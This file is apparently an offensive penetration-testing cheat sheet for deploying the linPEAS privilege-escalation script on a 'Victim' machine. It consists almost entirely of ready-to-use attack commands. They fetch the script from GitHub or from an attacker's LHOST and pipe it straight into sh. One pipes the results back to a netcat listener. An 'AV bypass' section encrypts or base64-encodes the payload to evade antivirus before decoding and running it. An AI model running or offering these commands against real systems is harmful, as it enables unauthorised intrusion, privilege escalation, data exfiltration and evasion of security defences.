# refer: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

# desc: Download
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

--- Quick Start

# desc: From github
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

# desc: Local network (Attacker)
sudo python -m SimpleHTTPServer #{LPORT}

# desc: Victim
curl #{LHOST}:#{LPORT}/linpeas.sh | sh

# desc: Without curl (Attacker)
sudo nc -q 5 -lvnp #{LPORT} < linpeas.sh

# desc: Victim
cat < /dev/tcp/#{LHOST}/#{LPORT} | sh

# desc: Excute from memory and send output back to the host (Attacker)
python3 -m http.server #{LPORT}
nc -lvnp #{lport_2} | tee linpeas.out

# desc: Victim
curl #{LHOST}:#{LPORT}/linpeas.sh | sh | nc #{LHOST} #{lport_2}

# desc: output to file
./linpeas.sh -a > /dev/shm/linpeas.txt
less -r /dev/shm/linpeas.txt

@lport_2.desc(Listen port with output)


--- AV bypass

# desc: open-ssl encryption (Attacker)
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer #{LPORT}

# desc: Victim
curl #{LHOST}:#{LPORT}/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh

# desc: Base64 encoded (Attacker)
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer #{LPORT}

# desc: Victim
curl #{LHOST}:#{LPORT}/lp.enc | base64 -d | sh

